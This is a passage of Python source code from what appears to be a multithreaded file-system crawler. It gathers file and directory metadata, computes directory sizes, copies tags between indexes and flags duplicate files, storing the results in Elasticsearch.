gets a directory from the Queue passes\n the directory to the crawl_path function.\n It runs in infinite loop until all worker thread\n tasks are finished (Queue empty).\n \"\"\"\n\n # create lists to hold files and directories\n filelist = []\n dirlist = []\n\n while True:\n if CLIARGS['nice']:\n time.sleep(.01)\n if VERBOSE:\n LOGGER.info('[thread-%s]: Looking for the next path in the queue',\n threadnum)\n\n # get a path from the Queue\n if CLIARGS['breadthfirst']:\n pri, path = q.get()\n else:\n path = q.get()\n\n if path is None:\n # add filelist to ES and empty it\n if len(filelist) > 0:\n index_add_files(threadnum, filelist)\n del filelist[:]\n # add dirlist to ES and empty it\n if len(dirlist) > 0:\n index_add_dirs(threadnum, dirlist)\n del dirlist[:]\n update_progress(finished=True)\n # stop thread's infinite loop\n q.task_done()\n break\n else:\n # start crawling the path\n filelist, dirlist = crawl_path(path, threadnum, filelist, dirlist)\n\n # update progress bar\n update_progress()\n\n # task is done\n q.task_done()\n\n\ndef get_dir_meta(threadnum, path, dirlist):\n \"\"\"This is the get directory meta data function.\n It gets directory meta and adds to Elasticsearch.\n Once dirlist reaches max chunk_size or Queue is empty,\n it is bulk added to Elasticsearch and emptied.\n \"\"\"\n global reindex_dir_list\n\n try:\n lstat_path = os.lstat(path)\n # add directory meta data to dirlist list\n mtime_unix = lstat_path.st_mtime\n mtime_utc = datetime.utcfromtimestamp(mtime_unix)\\\n .strftime('%Y-%m-%dT%H:%M:%S')\n atime_unix = lstat_path.st_atime\n atime_utc = datetime.utcfromtimestamp(atime_unix)\\\n .strftime('%Y-%m-%dT%H:%M:%S')\n ctime_unix = lstat_path.st_ctime\n ctime_utc = datetime.utcfromtimestamp(ctime_unix)\\\n .strftime('%Y-%m-%dT%H:%M:%S')\n # get time now in utc\n indextime_utc = datetime.utcnow().strftime(\"%Y-%m-%dT%H:%M:%S.%f\")\n # get user id of owner\n uid = lstat_path.st_uid\n # try to get owner user name\n try:\n owner = pwd.getpwuid(uid).pw_name.split('\\\\')\n # remove domain before owner\n if len(owner) == 2:\n owner = owner[1]\n else:\n owner = owner[0]\n # if we can't find the owner's user name, use the uid number\n except KeyError:\n owner = uid\n # get group id\n gid = lstat_path.st_gid\n # try to get group name\n try:\n group = grp.getgrgid(gid).gr_name.split('\\\\')\n # remove domain before group\n if len(group) == 2:\n group = group[1]\n else:\n group = group[0]\n # if we can't find the group name, use the gid number\n except KeyError:\n group = gid\n\n filename = os.path.basename(path)\n parentdir = os.path.abspath(os.path.join(path, os.pardir))\n fullpath = parentdir + '/' + filename\n\n dirmeta_dict = {\n \"filename\": filename,\n \"path_parent\": parentdir,\n \"filesize\": 0,\n \"items\": 0,\n \"last_modified\": mtime_utc,\n \"last_access\": atime_utc,\n \"last_change\": ctime_utc,\n \"owner\": owner,\n \"group\": group,\n \"tag\": \"\",\n \"tag_custom\": \"\",\n \"indexing_date\": indextime_utc\n }\n\n # search for and copy over any existing tags\n search_path = fullpath\n for sublist in reindex_dir_list:\n if sublist[0] == search_path:\n dirmeta_dict['tag'] = sublist[1]\n dirmeta_dict['tag_custom'] = sublist[2]\n break\n\n # check plugins for adding extra meta data to dirmeta_dict\n for plugin in plugins:\n try:\n # check if plugin is for directory doc\n mappings = {'mappings': {'directory': {'properties': {}}}}\n mappings = (plugin.add_mappings(mappings))\n dirmeta_dict.update(plugin.add_meta(fullpath))\n except KeyError:\n pass\n\n # add dirinfo to dirlist\n dirlist.append(dirmeta_dict)\n\n # when dirlist reaches max chunk size, bulk add to ES and empty it\n if len(dirlist) >= CONFIG['es_chunksize']:\n index_add_dirs(threadnum, dirlist)\n del dirlist[:]\n\n except (IOError, OSError):\n if VERBOSE:\n LOGGER.error('Error crawling directory %s', path, exc_info=True)\n pass\n\n return dirlist\n\n\ndef get_file_meta(threadnum, entry, filelist, singlefile=False):\n \"\"\"This is the get file meta data function.\n It gets file meta and adds to Elasticsearch.\n Once filelist reaches max chunk_size or Queue is empty,\n it is bulk added to Elasticsearch and emptied.\n Ignores files smaller than 'minsize' Bytes, newer\n than 'daysold' old and in 'excluded_files'.\n \"\"\"\n global total_files\n global total_file_size\n global total_files_skipped\n global total_file_size_skipped\n global reindex_file_list\n\n try:\n entry_stat = entry.stat()\n # get file size (bytes)\n size = entry_stat.st_size\n\n # add to totals\n if not singlefile:\n with lock:\n total_files += 1\n total_file_size += size\n\n LOGGER.debug('Filename: <%s>', entry.name)\n LOGGER.debug('Path: <%s>', entry.path)\n\n # Skip files smaller than minsize cli flag\n if size < CLIARGS['minsize']:\n if VERBOSE:\n LOGGER.info('[thread-%s]: Skipping (size) %s',\n threadnum, entry.path)\n if not singlefile:\n with lock:\n total_files_skipped += 1\n total_file_size_skipped += size\n return filelist\n\n # check if file is in exluded_files list\n if entry.name in CONFIG['excluded_files'] or \\\n (entry.name.startswith('.') and u'.*'\n in CONFIG['excluded_files']):\n if VERBOSE:\n LOGGER.info('[thread-%s]: Skipping (excluded file) %s',\n threadnum, entry.path)\n if not singlefile:\n with lock:\n total_files_skipped += 1\n total_file_size_skipped += size\n return filelist\n\n # get file extension and check excluded_files\n extension = os.path.splitext(entry.name)[1][1:].strip().lower()\n LOGGER.debug('Extension: <%s>', extension)\n if (not extension and 'NULLEXT' in CONFIG['excluded_files']) \\\n or '*.' + extension in CONFIG['excluded_files']:\n if VERBOSE:\n LOGGER.info('[thread-%s]: Skipping (excluded file) %s',\n threadnum, entry.path)\n if not singlefile:\n with lock:\n total_files_skipped += 1\n total_file_size_skipped += size\n return filelist\n\n # check file modified time\n mtime_unix = entry_stat.st_mtime\n mtime_utc = \\\n datetime.utcfromtimestamp(mtime_unix).strftime('%Y-%m-%dT%H:%M:%S')\n # Convert time in days to seconds\n time_sec = CLIARGS['mtime'] * 86400\n file_mtime_sec = time.time() - mtime_unix\n # Only process files modified at least x days ago\n if file_mtime_sec < time_sec:\n if VERBOSE:\n LOGGER.info('[thread-%s]: Skipping (mtime) %s',\n threadnum, entry.path)\n if not singlefile:\n with lock:\n total_files_skipped += 1\n total_file_size_skipped += size\n return filelist\n\n # get access time\n atime_unix = entry_stat.st_atime\n atime_utc = \\\n datetime.utcfromtimestamp(atime_unix).strftime('%Y-%m-%dT%H:%M:%S')\n # get change time\n ctime_unix = entry_stat.st_ctime\n ctime_utc = \\\n datetime.utcfromtimestamp(ctime_unix).strftime('%Y-%m-%dT%H:%M:%S')\n # get user id of owner\n uid = entry_stat.st_uid\n # try to get owner user name\n try:\n owner = pwd.getpwuid(uid).pw_name.split('\\\\')\n # remove domain before owner\n if len(owner) == 2:\n owner = owner[1]\n else:\n owner = owner[0]\n # if we can't find the owner's user name, use the uid number\n except KeyError:\n owner = uid\n # get group id\n gid = entry_stat.st_gid\n # try to get group name\n try:\n group = grp.getgrgid(gid).gr_name.split('\\\\')\n # remove domain before group\n if len(group) == 2:\n group = group[1]\n else:\n group = group[0]\n # if we can't find the group name, use the gid number\n except KeyError:\n group = gid\n # get inode number\n inode = entry.inode()\n # get number of hardlinks\n hardlinks = entry_stat.st_nlink\n # create md5 hash of file using metadata filesize and mtime\n filestring = str(size) + str(mtime_unix)\n filehash = hashlib.md5(filestring.encode('utf-8')).hexdigest()\n # get time\n indextime_utc = datetime.utcnow().strftime(\"%Y-%m-%dT%H:%M:%S.%f\")\n # get absolute path of parent directory\n parentdir = os.path.abspath(os.path.join(entry.path, os.pardir))\n\n # create file metadata dictionary\n filemeta_dict = {\n \"filename\": entry.name,\n \"extension\": extension,\n \"path_parent\": parentdir,\n \"filesize\": size,\n \"owner\": owner,\n \"group\": group,\n \"last_modified\": mtime_utc,\n \"last_access\": atime_utc,\n \"last_change\": ctime_utc,\n \"hardlinks\": hardlinks,\n \"inode\": inode,\n \"filehash\": filehash,\n \"tag\": \"\",\n \"tag_custom\": \"\",\n \"dupe_md5\": \"\",\n \"indexing_date\": indextime_utc,\n \"indexing_thread\": threadnum\n }\n\n # check if we are just indexing one file\n if singlefile:\n # check if file exists already in index\n LOGGER.info('Removing any existing same file from index')\n index_delete_file(filemeta_dict)\n\n # search for and copy over any existing tags\n search_path = parentdir + '/' + entry.name\n for sublist in reindex_file_list:\n if sublist[0] == search_path:\n filemeta_dict['tag'] = sublist[1]\n filemeta_dict['tag_custom'] = sublist[2]\n break\n\n # check plugins for adding extra meta data to filemeta_dict\n for plugin in plugins:\n try:\n # check if plugin is for file doc\n mappings = {'mappings': {'file': {'properties': {}}}}\n mappings = (plugin.add_mappings(mappings))\n filemeta_dict.update(plugin.add_meta(entry.path))\n except KeyError:\n pass\n\n # add file metadata dictionary to filelist list\n filelist.append(filemeta_dict)\n\n # check if we are just indexing one file\n if singlefile:\n LOGGER.info('Adding file to index: %s' % CLIARGS['index'])\n index_add_files(threadnum, filelist)\n LOGGER.info('File added to Elasticsearch, any tags have been copied')\n return\n else:\n # when filelist reaches max chunk size, bulk add to ES and empty it\n if len(filelist) >= CONFIG['es_chunksize']:\n index_add_files(threadnum, filelist)\n del filelist[:]\n\n except (IOError, OSError):\n if VERBOSE:\n LOGGER.error('[thread-%s]: Error crawling file %s',\n threadnum, entry.path, exc_info=True)\n pass\n\n return filelist\n\n\ndef escape_chars(text):\n \"\"\"This is the escape special characters function.\n It returns escaped strings for ES queries.\"\"\"\n chr_dict = {'/': '\\\\/', '(': '\\\\(', ')': '\\\\)', '[': '\\\\[', ']': '\\\\]',\n ' ': '\\\\ ', '&': '\\\\&', '<': '\\\\<', '>': '\\\\>', '+': '\\\\+', '-': '\\\\-',\n '|': '\\\\|', '!': '\\\\!', '{': '\\\\{', '}': '\\\\}', '^': '\\\\^', '~': '\\\\~',\n '?': '\\\\?', ':': '\\\\:'}\n def char_trans(text, chr_dict):\n for key, value in chr_dict.items():\n text = text.replace(key, value)\n return text\n if IS_PY3:\n text_esc = text.translate(str.maketrans(chr_dict))\n else:\n text_esc = char_trans(text, chr_dict)\n return text_esc\n\n\ndef dirsize_worker(threadnum):\n \"\"\"This is the get directory size worker function.\n It gets a directory from the Queue and searches ES for all files\n in the directory (recursive) and sums their filesizes\n to create a total filesize and item count for each dir.\n Updates dir doc's filesize and items fields.\n \"\"\"\n dir_id_list = []\n\n while True:\n totalsize = 0\n totalitems = 0\n\n if CLIARGS['nice']:\n time.sleep(.01)\n if VERBOSE:\n LOGGER.info('[thread-%s]: Looking for the next directory',\n threadnum)\n path = q.get() # [docid, fullpath, mtime, doctype]\n\n if path is None:\n # wait for ES health to be at least yellow\n ES.cluster.health(wait_for_status='yellow',\n request_timeout=CONFIG['es_timeout'])\n helpers.bulk(ES, dir_id_list, index=CLIARGS['index'],\n doc_type='directory',\n chunk_size=CONFIG['es_chunksize'],\n request_timeout=CONFIG['es_timeout'])\n del dir_id_list[:]\n update_progress(finished=True)\n # stop thread's infinite loop\n q.task_done()\n break\n else:\n if VERBOSE:\n LOGGER.info('[thread-%s]: Calculating size: %s', threadnum, path[1])\n\n # file doc search with aggregate for sum filesizes\n # escape special characters\n newpath = escape_chars(path[1])\n\n data = {\n \"size\": 0,\n \"query\": {\n \"query_string\": {\n \"query\": \"path_parent: \" + newpath + \" \\\n OR path_parent: \" + newpath + \"\\/*\",\n \"analyze_wildcard\": \"true\"\n }\n },\n \"aggs\": {\n \"total_size\": {\n \"sum\": {\n \"field\": \"filesize\"\n }\n }\n }\n }\n\n # refresh index\n #ES.indices.refresh(index=CLIARGS['index'])\n # search ES and start scroll\n res = ES.search(index=CLIARGS['index'], doc_type='file', body=data,\n request_timeout=CONFIG['es_timeout'])\n\n # add total files to items\n totalitems += res['hits']['total']\n\n # total file size sum\n totalsize = res['aggregations']['total_size']['value']\n\n # search and add total directories to items\n\n data = {\n \"size\": 0,\n \"query\": {\n \"query_string\": {\n \"query\": \"path_parent: \" + newpath + \" \\\n OR path_parent: \" + newpath + \"\\/*\",\n \"analyze_wildcard\": \"true\"\n }\n }\n }\n\n res = ES.search(index=CLIARGS['index'], doc_type='directory',\n body=data, request_timeout=CONFIG['es_timeout'])\n\n # add total directories (subdirs) to items\n totalitems += res['hits']['total']\n\n # ES id of directory doc\n directoryid = path[0]\n\n # update filesize field for directory (path) doc\n d = {\n '_op_type': 'update',\n '_index': CLIARGS['index'],\n '_type': 'directory',\n '_id': directoryid,\n 'doc': {'filesize': totalsize, 'items': totalitems}\n }\n dir_id_list.append(d)\n\n # bulk add to ES once we reach max chunk size\n if len(dir_id_list) >= CONFIG['es_chunksize']:\n # wait for ES health to be at least yellow\n ES.cluster.health(wait_for_status='yellow',\n request_timeout=CONFIG['es_timeout'])\n helpers.bulk(ES, dir_id_list, index=CLIARGS['index'],\n doc_type='directory',\n chunk_size=CONFIG['es_chunksize'],\n request_timeout=CONFIG['es_timeout'])\n del dir_id_list[:]\n\n update_progress()\n\n # task is done\n q.task_done()\n\n\ndef copytag_worker(threadnum):\n \"\"\"This is the copy tag worker function.\n It gets a path from the Queue and searches index2 for the\n same path and copies any existing tags.\n Updates index's doc's tag and tag_custom fields.\n \"\"\"\n dir_id_list = []\n file_id_list = []\n\n while True:\n totalsize = 0\n totalitems = 0\n\n if CLIARGS['nice']:\n time.sleep(.01)\n if VERBOSE:\n LOGGER.info('[thread-%s]: Looking for the next path in queue',\n threadnum)\n path = q.get() # [docid, fullpath, mtime, doctype]\n\n if path is None:\n # wait for ES health to be at least yellow\n ES.cluster.health(wait_for_status='yellow',\n request_timeout=CONFIG['es_timeout'])\n helpers.bulk(ES, dir_id_list, index=CLIARGS['index'],\n doc_type='directory',\n chunk_size=CONFIG['es_chunksize'],\n request_timeout=CONFIG['es_timeout'])\n del dir_id_list[:]\n helpers.bulk(ES, file_id_list, index=CLIARGS['index'],\n doc_type='file',\n chunk_size=CONFIG['es_chunksize'],\n request_timeout=CONFIG['es_timeout'])\n del file_id_list[:]\n update_progress(finished=True)\n # stop thread's infinite loop\n q.task_done()\n break\n else:\n if VERBOSE:\n LOGGER.info('[thread-%s]: Copying tags: %s', threadnum, path[1])\n\n # doc search (matching path) in index2 for existing tags\n # filename\n f = os.path.basename(path[1])\n # parent path\n p = os.path.abspath(os.path.join(path[1], os.pardir))\n\n data = {\n \"size\": 1,\n \"_source\": ['tag', 'tag_custom'],\n \"query\": {\n \"query_string\": {\n \"query\": \"filename: \\\"\" + f + \"\\\" AND path_parent: \\\"\" + p + \"\\\"\"\n }\n }\n }\n\n # refresh index\n #ES.indices.refresh(index=CLIARGS['index'])\n\n # check if file or directory\n if path[3] is 'directory':\n # search ES\n res = ES.search(index=CLIARGS['copytags'], doc_type='directory', body=data,\n request_timeout=CONFIG['es_timeout'])\n else:\n res = ES.search(index=CLIARGS['copytags'], doc_type='file', body=data,\n request_timeout=CONFIG['es_timeout'])\n\n # mark task done if no matching path in index2 and continue\n if len(res['hits']['hits']) == 0:\n update_progress()\n q.task_done()\n continue\n\n # existing tag in index2\n tag = res['hits']['hits'][0]['_source']['tag']\n # existing tag_custom in index2\n tag_custom = res['hits']['hits'][0]['_source']['tag_custom']\n\n # update tag and tag_custom fields in index\n d = {\n '_op_type': 'update',\n '_index': CLIARGS['index'],\n '_type': path[3],\n '_id': path[0],\n 'doc': {'tag': tag, 'tag_custom': tag_custom}\n }\n if path[3] is 'directory':\n dir_id_list.append(d)\n else:\n file_id_list.append(d)\n\n # bulk add to ES once we reach max chunk size\n if len(dir_id_list) >= CONFIG['es_chunksize']:\n # wait for ES health to be at least yellow\n ES.cluster.health(wait_for_status='yellow',\n request_timeout=CONFIG['es_timeout'])\n helpers.bulk(ES, dir_id_list, index=CLIARGS['index'],\n doc_type='directory',\n chunk_size=CONFIG['es_chunksize'],\n request_timeout=CONFIG['es_timeout'])\n del dir_id_list[:]\n if len(file_id_list) >= CONFIG['es_chunksize']:\n # wait for ES health to be at least yellow\n ES.cluster.health(wait_for_status='yellow',\n request_timeout=CONFIG['es_timeout'])\n helpers.bulk(ES, file_id_list, index=CLIARGS['index'],\n doc_type='file',\n chunk_size=CONFIG['es_chunksize'],\n request_timeout=CONFIG['es_timeout'])\n del file_id_list[:]\n\n update_progress()\n\n # task is done\n q.task_done()\n\n\ndef check_dir_excludes(path):\n \"\"\"Return Boolean if path in excluded_dirs list\"\"\"\n global total_dirs_skipped\n\n # skip any dirs in excluded dirs\n if os.path.basename(path) in CONFIG['excluded_dirs'] \\\n or path in CONFIG['excluded_dirs']:\n if VERBOSE:\n LOGGER.info('Skipping (excluded dir) %s', path)\n with lock:\n total_dirs_skipped += 1\n return True\n # skip any dirs which start with . and in excluded dirs\n elif os.path.basename(path).startswith('.') and u'.*' \\\n in CONFIG['excluded_dirs']:\n if VERBOSE:\n LOGGER.info('Skipping (.* dir) %s', path)\n with lock:\n total_dirs_skipped += 1\n return True\n else:\n return False\n\n\ndef start_crawl(path, crawlbot=False):\n \"\"\"This is the start crawl function.\n It starts crawling the tree from the top rootdir\n using scandir.walk and adds directories to\n the Queue.\n \"\"\"\n\n LOGGER.info('Starting crawl using %s threads', CLIARGS['threads'])\n\n try:\n # set maxdepth level\n level = CLIARGS['maxdepth']\n # set current depth\n num_sep = path.count(os.path.sep)\n # check for reindex (non-recursive) or crawlbot\n if CLIARGS['reindex'] or crawlbot:\n level = 1\n\n if CLIARGS['breadthfirst']: # breadth-first crawl\n LOGGER.info(\n 'Walking tree (breadth-first, maxdepth:%s)'\n % level)\n for root, dirs, files in walk(path):\n depth = root.count(os.path.sep) - num_sep # priority\n excluded = check_dir_excludes(root)\n if excluded is False:\n if VERBOSE:\n LOGGER.info(\"Adding path to queue: %s (depth:%s)\",\n root, depth)\n q.put((depth, root))\n elif excluded is True:\n del dirs[:]\n num_sep_this = root.count(os.path.sep)\n if num_sep + level <= num_sep_this:\n del dirs[:]\n\n else: # depth-first (default)\n for root, dirs, files in walk(path):\n excluded = check_dir_excludes(root)\n if excluded is False:\n if VERBOSE:\n LOGGER.info('Adding path to queue: %s', root)\n # add directory to queue\n q.put(root)\n elif excluded is True:\n del dirs[:]\n num_sep_this = root.count(os.path.sep)\n if num_sep + level <= num_sep_this:\n del dirs[:]\n\n # put None into the queue to trigger final ES bulk operations\n for i in range(int(CLIARGS['threads'])):\n if CLIARGS['breadthfirst']:\n q.put((9999, None))\n else:\n q.put(None)\n # block until all tasks are done\n q.join()\n\n except KeyboardInterrupt:\n LOGGER.disabled = True\n print('\\nCtrl-c keyboard interrupt received')\n print(\"Attempting to close worker threads\")\n # stop workers\n for i in range(int(CLIARGS['threads'])):\n if CLIARGS['breadthfirst']:\n q.put((9999, None))\n else:\n q.put(None)\n print(\"\\nThreads successfully closed, sayonara!\")\n sys.exit(0)\n\n\ndef worker_setup_crawl(path, crawlbot=False):\n \"\"\"This is the worker setup function for directory crawling.\n It sets up the worker threads to process items in the Queue.\n crawloop is set to True if running in bot mode.\n \"\"\"\n threads = []\n\n # set up the threads and start them\n for i in range(int(CLIARGS['threads'])):\n # create thread\n t = threading.Thread(target=crawl_worker, args=(i,))\n t.daemon = True\n t.start()\n threads.append(t)\n if CLIARGS['nice']:\n time.sleep(0.5)\n\n # set unicode path for python2\n if not IS_PY3:\n path = unicode(path)\n\n if not CLIARGS['reindex'] and not CLIARGS['reindexrecurs'] and not crawlbot:\n # add crawl stats to ES\n add_crawl_stats(STARTTIME)\n # add disk space info to ES\n add_diskspace(path)\n\n # start crawling the path\n start_crawl(path, crawlbot)\n\n\ndef worker_setup_dirsizes(dirlist, crawlbot=False):\n \"\"\"This is the directory sizes worker setup function.\n It sets up the worker threads to process the directory list Queue\n for calculating total directory sizes and item counts in ES.\n \"\"\"\n global total_dirs\n\n # set up the threads and start them\n LOGGER.info('Running with %s threads', CLIARGS['threads'])\n\n threads = []\n for i in range(int(CLIARGS['threads'])):\n # start thread\n t = threading.Thread(target=dirsize_worker, args=(i,))\n t.daemon = True\n t.start()\n threads.append(t)\n if CLIARGS['nice']:\n time.sleep(0.5)\n\n LOGGER.info('Calculating directory sizes')\n\n try:\n for d in dirlist:\n q.put(d)\n total_dirs += 1\n # stop workers\n for i in range(int(CLIARGS['threads'])):\n q.put(None)\n # block until all tasks are done\n q.join()\n\n if crawlbot and not CLIARGS['quiet'] and not CLIARGS['progress']:\n sys.stdout.write(\"\\n\")\n sys.stdout.flush()\n\n except KeyboardInterrupt:\n LOGGER.disabled = True\n print('\\nCtrl-c keyboard interrupt received')\n print(\"Attempting to close worker threads\")\n # stop workers\n for i in range(int(CLIARGS['threads'])):\n q.put(None)\n print(\"\\nThreads successfully closed, sayonara!\")\n sys.exit(0)\n\n\ndef worker_setup_copytags(dirlist, filelist):\n \"\"\"This is the copy tags worker setup function.\n It sets up the worker threads to process the directory and file list Queue\n for copying directory and file tags from index2 to index in ES.\n \"\"\"\n global total_dirs\n global total_files\n\n # set up the threads and start them\n LOGGER.info('Running with %s threads', CLIARGS['threads'])\n\n threads = []\n for i in range(int(CLIARGS['threads'])):\n # start thread\n t = threading.Thread(target=copytag_worker, args=(i,))\n t.daemon = True\n t.start()\n threads.append(t)\n if CLIARGS['nice']:\n time.sleep(0.5)\n\n LOGGER.info('Copying tags from %s to %s', CLIARGS['copytags'][0], CLIARGS['index'])\n\n try:\n for d in dirlist:\n q.put(d)\n total_dirs += 1\n for f in filelist:\n q.put(f)\n total_files += 1\n # stop workers\n for i in range(int(CLIARGS['threads'])):\n q.put(None)\n # block until all tasks are done\n q.join()\n\n except KeyboardInterrupt:\n LOGGER.disabled = True\n print('\\nCtrl-c keyboard interrupt received')\n print(\"Attempting to close worker threads\")\n # stop workers\n for i in range(int(CLIARGS['threads'])):\n q.put(None)\n print(\"\\nThreads successfully closed, sayonara!\")\n sys.exit(0)\n\n\ndef worker_setup_dupes():\n \"\"\"This is the duplicate file worker setup function.\n It sets up the worker threads to process the duplicate file list Queue.\n \"\"\"\n\n # set up the threads and start them\n LOGGER.info('Running with %s threads', CLIARGS['threads'])\n\n threads = []\n for i in range(int(CLIARGS['threads'])):\n # start thread\n t = threading.Thread(target=dupes_worker, args=(i,))\n t.daemon = True\n t.start()\n threads.append(t)\n if CLIARGS['nice']:\n time.sleep(0.5)\n\n LOGGER.info('Searching %s for duplicate file hashes', CLIARGS['index'])\n\n try:\n # look in ES for duplicate files (same filehash) and add to queue\n dupes_finder()\n # stop workers\n for i in range(int(CLIARGS['threads'])):\n q.put(None)\n # block until all tasks are done\n q.join()\n\n except KeyboardInterrupt:\n LOGGER.disabled = True\n print('\\nCtrl-c keyboard interrupt received')\n print(\"Attempting to close worker threads\")\n # stop workers\n for i in range(int(CLIARGS['threads'])):\n q.put(None)\n print(\"\\nThreads successfully closed, sayonara!\")\n sys.exit(0)\n\n\ndef dupes_worker(threadnum):\n \"\"\"This is the duplicate file worker thread function.\n It processes items in the dupes group Queue one after another.\n \"\"\"\n dupelist = []\n\n while True:\n if CLIARGS['nice']:\n time.sleep(.01)\n if VERBOSE:\n LOGGER.info('[thread-%s]: Looking for the next filehash group',\n threadnum)\n\n # get an item (hashkey) from the queue\n hashkey = q.get()\n\n if hashkey is None:\n # add any remaining to ES\n if len(dupelist) > 0:\n # update existing index and tag dupe files dupe_md5 field\n index_tag_dupe(threadnum, dupelist)\n del dupelist[:]\n update_progress(finished=True)\n # end thread's infinite loop\n q.task_done()\n break\n else:\n # find all files in ES matching hashkey\n hashgroup = populate_hashgroup(hashkey)\n # process the duplicate files in hashgroup and return dupelist\n dupelist = tag_dupes(threadnum, hashgroup, dupelist)\n\n update_progress()\n\n # task is done\n q.task_done()\n\n\ndef elasticsearch_connect():\n \"\"\"This is the Elasticsearch connect function.\n It creates the connection to Elasticsearch and returns ES instance.\n \"\"\"\n LOGGER.info('Connecting to Elasticsearch')\n # Check if we are using AWS ES\n if CONFIG['aws'] == \"True\":\n es = Elasticsearch(\n hosts=[{'host': CONFIG['es_host'], 'port': CONFIG['es_port']}],\n use_ssl=True, verify_certs=True,\n connection_class=RequestsHttpConnection,\n timeout=CONFIG['es_timeout'], maxsize=CONFIG['es_maxsize'],\n max_retries=CONFIG['es_max_retries'], retry_on_timeout=True)\n # Local connection to ES\n else:\n es = Elasticsearch(\n hosts=[{'host': CONFIG['es_host'], 'port': CONFIG['es_port']}],\n http_auth=(CONFIG['es_user'], CONFIG['es_password']),\n connection_class=Urllib3HttpConnection,\n timeout=CONFIG['es_timeout'], maxsize=CONFIG['es_maxsize'],\n max_retries=CONFIG['es_max_retries'], retry_on_timeout=True)\n # ping check Elasticsearch\n if not es.ping():\n LOGGER.error('Error connecting to Elasticsearch')\n sys.exit(1)\n return es\n\n\ndef index_create():\n \"\"\"This is the ES index create function.\n It checks for existing index and deletes if\n there is one with same name. It also creates\n the new index and sets up mappings.\n \"\"\"\n LOGGER.info('Checking ES index: %s', CLIARGS['index'])\n # check for existing es index\n if ES.indices.exists(index=CLIARGS['index']):\n # check if nodelete, reindex, cli argument\n # and don't delete existing index\n if CLIARGS['reindex']:\n LOGGER.info('Reindexing (non-recursive, preserving tags)')\n return\n elif CLIARGS['reindexrecurs']:\n LOGGER.info('Reindexing (recursive, preserving tags)')\n return\n elif CLIARGS['nodelete']:\n LOGGER.info('Adding to ES index')\n return\n # delete existing index\n else:\n LOGGER.warning('ES index exists, deleting')\n ES.indices.delete(index=CLIARGS['index'], ignore=[400, 404])\n # set up es index mappings and create new index\n mappings = {\n \"settings\": {\n \"analysis\": {\n \"analyzer\": {\n \"path_analyzer\": {\n \"tokenizer\": \"path_tokenizer\"\n }\n },\n \"tokenizer\": {\n \"path_tokenizer\": {\n \"type\": \"path_hierarchy\"\n }\n }\n }\n },\n \"mappings\": {\n \"diskspace\": {\n \"properties\": {\n \"path\": {\n \"type\": \"keyword\"\n },\n \"total\": {\n \"type\": \"long\"\n },\n \"used\": {\n \"type\": \"long\"\n },\n \"free\": {\n \"type\": \"long\"\n },\n \"available\": {\n \"type\": \"long\"\n },\n \"indexing_date\": {\n \"type\": \"date\"\n }\n }\n },\n \"crawlstat_start\": {\n \"properties\": {\n \"path\": {\n \"type\": \"keyword\"\n },\n \"start_time\": {\n \"type\": \"date\"\n },\n \"indexing_date\": {\n \"type\": \"date\"\n }\n }\n },\n \"crawlstat_stop\": {\n \"properties\": {\n \"path\": {\n \"type\": \"keyword\"\n },\n \"stop_time\": {\n \"type\": \"date\"\n },\n \"elapsed_time\": {\n \"type\": \"long\"\n },\n \"indexing_date\": {\n \"type\": \"date\"\n }\n }\n },\n \"directory\": {\n \"properties\": {\n \"filename\": {\n \"type\": \"keyword\"\n },\n \"path_parent\": {\n \"type\": \"keyword\",\n \"fields\": {\n \"tree\": {\n \"type\": \"text\",\n \"analyzer\": \"path_analyzer\"\n }\n }\n },\n \"filesize\": {\n \"type\": \"long\"\n },\n \"items\": {\n \"type\": \"long\"\n },\n \"owner\": {\n \"type\": \"keyword\"\n },\n \"group\": {\n \"type\": \"keyword\"\n },\n \"last_modified\": {\n \"type\": \"date\"\n },\n \"last_access\": {\n \"type\": \"date\"\n },\n \"last_change\": {\n \"type\": \"date\"\n },\n \"tag\": {\n \"type\": \"keyword\"\n },\n \"tag_custom\": {\n \"type\": \"keyword\"\n },\n \"indexing_date\": {\n \"type\": \"date\"\n }\n }\n },\n \"file\": {\n \"properties\": {\n \"filename\": {\n \"type\": \"keyword\"\n },\n \"extension\": {\n \"type\": \"keyword\"\n },\n \"path_parent\": {\n \"type\": \"keyword\",\n \"fields\": {\n \"tree\": {\n \"type\": \"text\",\n \"analyzer\": \"path_analyzer\"\n }\n }\n },\n \"filesize\": {\n \"type\": \"long\"\n },\n \"owner\": {\n \"type\": \"keyword\"\n },\n \"group\": {\n \"type\": \"keyword\"\n },\n \"last_modified\": {\n \"type\": \"date\"\n },\n \"last_access\": {\n \"type\": \"date\"\n },\n \"last_change\": {\n \"type\": \"date\"\n },\n \"hardlinks\": {\n \"type\": \"integer\"\n },\n \"inode\": {\n \"type\": \"long\"\n },\n \"filehash\": {\n \"type\": \"keyword\"\n },\n \"tag\": {\n \"type\": \"keyword\"\n },\n \"tag_custom\": {\n \"type\": \"keyword\"\n },\n \"dupe_md5\": {\n \"type\": \"keyword\"\n },\n \"indexing_date\": {\n \"type\": \"date\"\n },\n \"indexing_thread\": {\n \"type\": \"integer\"\n }\n }\n }\n }\n }\n\n # check plugins for additional mappings\n for plugin in plugins:\n mappings = (plugin.add_mappings(mappings))\n\n LOGGER.info('Creating ES index')\n ES.indices.create(index=CLIARGS['index'], body=mappings)\n\n\ndef index_add_files(threadnum, filelist):\n \"\"\"This is the ES index add files function.\n It bulk adds file meta data from worker's crawl\n results into ES.\n \"\"\"\n if VERBOSE:\n LOGGER.info('[thread-%s]: Bulk adding files to ES index', threadnum)\n # wait for ES health to be at least yellow\n ES.cluster.health(wait_for_status='yellow',\n request_timeout=CONFIG['es_timeout'])\n # bulk load data to Elasticsearch index\n helpers.bulk(ES, filelist, index=CLIARGS['index'], doc_type='file',\n chunk_size=CONFIG['es_chunksize'],\n request_timeout=CONFIG['es_timeout'])\n\n\ndef index_add_dirs(threadnum, dirlist):\n \"\"\"This is the ES index add directories function.\n It bulk adds directory meta data from worker's crawl\n results into ES.\n \"\"\"\n if VERBOSE:\n LOGGER.info(\n '[thread-%s]: Bulk adding directories to ES index', threadnum)\n # wait for ES health to be at least yellow\n ES.cluster.health(wait_for_status='yellow',\n request_timeout=CONFIG['es_timeout'])\n # bulk load data to Elasticsearch index\n helpers.bulk(ES, dirlist, index=CLIARGS['index'], doc_type='directory',\n chunk_size=CONFIG['es_chunksize'],\n request_timeout=CONFIG['es_timeout'])\n\n\ndef index_delete_file(file_dict):\n \"\"\"This is the ES delete file function.\n It finds all files that have same path and deletes them from ES.\n Only intended to delete single file, use index_delete_path for bulk delete\n of files in same directory.\n \"\"\"\n global reindex_file_list\n\n # get the file id\n data = {\n \"query\": {\n \"query_string\": {\n \"query\": \"path_parent: \\\"\" + 